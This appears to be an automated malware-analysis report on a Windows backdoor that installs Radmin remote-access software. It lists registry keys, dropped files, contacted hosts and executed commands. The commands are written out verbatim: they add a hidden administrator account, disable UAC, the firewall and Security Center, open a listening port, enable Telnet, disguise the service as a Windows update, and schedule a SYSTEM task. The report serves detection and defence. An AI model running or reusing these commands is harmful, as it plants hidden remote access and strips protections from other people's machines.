Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'cam_server.exe' = '%WINDIR%\cam_server.exe pass=ganja1 port=57011'
- %WINDIR%\Tasks\security.job
- [<HKLM>\SYSTEM\ControlSet001\Services\mirrorv3] 'Start' = '00000001'
- [<HKLM>\SYSTEM\ControlSet001\Services\raddrvv3] 'Start' = '00000001'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\RServer3] 'Start' = '00000002'
- User Account Control (UAC)
- '%TEMP%\ip.exe'
- '<SYSTEM32>\rserver30\FamItrfc.Exe'
- '%WINDIR%\cam_server.exe' pass=ganja1 port=57011
- '%TEMP%\17.tmp\realip.exe'
- '<SYSTEM32>\rserver30\rserver3.exe' /service
- '%TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe' /stop
- '%TEMP%\inst.exe'
- '<SYSTEM32>\rserver30\rsetup.exe' /start
- '<SYSTEM32>\rserver30\rsetup.exe' /intsetup
- '<SYSTEM32>\msiexec.exe' /i "%TEMP%\msupdate.msi" /qn /norestart
- '<SYSTEM32>\net1.exe' user HelpAssistant admin
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\runonce.exe' -r
- '<SYSTEM32>\msiexec.exe' -Embedding CE4DC1DD8671DE38A5D722008C0D3791
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 57011 all
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%WINDIR%\cam_server.exe" "cam_server" ENABLE
- '<SYSTEM32>\net1.exe' user HelpAssistant admin /add
- '<SYSTEM32>\net1.exe' user HelpAssistant /active:yes /comment:"Учет**я з*пись для предост*вле*ия помощи" /passwordchg:yes
- '<SYSTEM32>\net1.exe' localgroup Адми*истр*торы HelpAssistant /add
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\rserver30\wsock32.dll,ntskd noreboot
- '<SYSTEM32>\net1.exe' stop rserver3
- '<SYSTEM32>\net.exe' stop rserver3
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\RServer3" /v "DisplayName" /d "Microsoft Update Provide" /f
- '<SYSTEM32>\net1.exe' start rserver3
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\RServer3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
- '<SYSTEM32>\ipconfig.exe' /all
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\17.tmp\ip.bat" "
- '<SYSTEM32>\ping.exe' -n 5 127.0.0.1
- '<SYSTEM32>\schtasks.exe' /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "%WINDIR%/ip.exe /f
- '<SYSTEM32>\attrib.exe' +S +H <SYSTEM32>\rserver30
- '<SYSTEM32>\sc.exe' config wscsvc start= disabled
- '<SYSTEM32>\net1.exe' stop wscsvc
- '<SYSTEM32>\net.exe' stop SharedAccess
- '<SYSTEM32>\sc.exe' config SharedAccess start= disabled
- '<SYSTEM32>\net1.exe' stop SharedAccess
- '<SYSTEM32>\net.exe' stop Alerter
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\inst.cmd" "
- '<SYSTEM32>\net1.exe' stop Alerter
- '<SYSTEM32>\net.exe' stop wscsvc
- '<SYSTEM32>\sc.exe' config Alerter start= disabled
- '<SYSTEM32>\sc.exe' config TlntSvr start= auto
- '<SYSTEM32>\attrib.exe' +s +h +r "%WINDIR%/ip.exe"
- '<SYSTEM32>\reg.exe' add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "%WINDIR%\cam_server.exe pass=ganja1 port=57011" /f
- '<SYSTEM32>\attrib.exe' +s +h +r "%WINDIR%/cam_server.exe"
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="%WINDIR%\blat.exe" security=notrequired action=allow
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="RealIP" dir=in program="%WINDIR%\realip.exe" security=notrequired action=allow
- '<SYSTEM32>\tlntsvr.exe'
- '<SYSTEM32>\net1.exe' start TlntSvr
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HelpAssistant /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- <SYSTEM32>\rserver30\wsock32.dll
- %WINDIR%\Installer\MSIA.tmp
- <SYSTEM32>\rserver30\Radmin30ru.chm
- <SYSTEM32>\rserver30\1049.lng_rad
- %WINDIR%\Installer\MSIB.tmp
- %WINDIR%\inf\oem3.PNF
- <DRIVERS>\SETE.tmp
- <SYSTEM32>\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CAT
- %WINDIR%\inf\oem3.inf
- <SYSTEM32>\rserver30\rminiv3.sys
- <SYSTEM32>\rserver30\mirrorv3.dll
- <SYSTEM32>\rserver30\vcintsx.dll
- <SYSTEM32>\rserver30\rsetup.exe
- <SYSTEM32>\rserver30\mirrorv3.inf
- <SYSTEM32>\rserver30\eula.txt
- <SYSTEM32>\rserver30\Radmin30.chm
- <SYSTEM32>\rserver30\mirrorv3.cat
- <SYSTEM32>\rserver30\raddrvv3.sys
- <SYSTEM32>\SETF.tmp
- %TEMP%\17.tmp\ip.bat
- %TEMP%\17.tmp\blat.exe
- <SYSTEM32>\rserver30\Radm_log.htm
- %WINDIR%\Installer\MSI16.tmp
- %TEMP%\17.tmp\blat.lib
- %TEMP%\17.tmp\localip.txt
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\IP[1].php
- %TEMP%\17.tmp\realip.exe
- %TEMP%\17.tmp\blat.dll
- %WINDIR%\Installer\MSI12.tmp
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\ARPPRODUCTICON.exe
- %WINDIR%\Installer\MSI10.tmp
- %WINDIR%\Installer\MSI11.tmp
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\Z_MENU_SRVCFG_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %WINDIR%\Installer\MSI13.tmp
- %WINDIR%\Installer\MSI15.tmp
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\NewShortcut4_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %APPDATA%\Microsoft\Installer\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\NewShortcut3_6BF1780B36EA432B9451DD84FF5C9D52.exe
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\FirewallInstallHelper.dll
- %WINDIR%\Installer\MSI2.tmp
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI6.tmp
- C:\Config.Msi\387e1.rbs
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI5.tmp
- %TEMP%\ip.exe
- %TEMP%\msupdate.msi
- %TEMP%\cam_server.exe
- %TEMP%\inst.exe
- %TEMP%\poc.exe
- %WINDIR%\cam_server.exe
- %WINDIR%\Installer\387de.msi
- %TEMP%\1.tmp\inst.cmd
- %WINDIR%\ip.exe
- %WINDIR%\Installer\MSI8.tmp
- <SYSTEM32>\rserver30\CHATLOGS\info.txt
- <SYSTEM32>\rserver30\rschatx.dll
- <SYSTEM32>\rserver30\rsl.exe
- <SYSTEM32>\rserver30\rchatx.dll
- <SYSTEM32>\rserver30\ChatLPCx.dll
- <SYSTEM32>\rserver30\rsaudiox.dll
- <SYSTEM32>\rserver30\vcintcx.dll
- <SYSTEM32>\rserver30\raudiox.dll
- <SYSTEM32>\rserver30\voicex.dll
- <SYSTEM32>\rserver30\WinLpcDl2.dll
- <SYSTEM32>\rserver30\FamItrfc.Exe
- %WINDIR%\Installer\MSI9.tmp
- <SYSTEM32>\rserver30\WinLpcDl.dll
- <SYSTEM32>\rserver30\FamItrf2.Exe
- <SYSTEM32>\rserver30\R_sui.dll
- <SYSTEM32>\rserver30\RCursor.dll
- <SYSTEM32>\rserver30\FirewallInstallHelper.dll
- <SYSTEM32>\rserver30\rserver3.exe
- <SYSTEM32>\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CAT
- %WINDIR%\cam_server.exe
- %WINDIR%\ip.exe
- %WINDIR%\Installer\MSI15.tmp
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\FirewallInstallHelper.dll
- C:\Config.Msi\387e1.rbs
- %WINDIR%\Installer\MSI13.tmp
- %WINDIR%\Installer\MSI6.tmp
- %WINDIR%\Installer\387de.msi
- %TEMP%\1.tmp\inst.cmd
- %WINDIR%\Installer\MSI16.tmp
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup.exe
- %TEMP%\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe
- %WINDIR%\Installer\MSI12.tmp
- %WINDIR%\Installer\MSI5.tmp
- %WINDIR%\Installer\MSI8.tmp
- %WINDIR%\Installer\MSI4.tmp
- %WINDIR%\Installer\MSI2.tmp
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI10.tmp
- %WINDIR%\Installer\MSI11.tmp
- %WINDIR%\Installer\MSIB.tmp
- %WINDIR%\Installer\MSI9.tmp
- %WINDIR%\Installer\MSIA.tmp
- from <SYSTEM32>\SETF.tmp to <SYSTEM32>\mirrorv3.dll
- from <DRIVERS>\SETE.tmp to <DRIVERS>\rminiv3.sys
- 'ex#####lzone.wallst.ru':80
- 'www.la###search.com':80
- 'localhost':1038
- ex#####lzone.wallst.ru/IP.php
- www.la###search.com/getip.php?la######
- DNS ASK ex#####lzone.wallst.ru
- DNS ASK www.la###search.com
- ClassName: 'IEFrame' WindowName: '(null)'
- ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
- ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: '' WindowName: '(null)'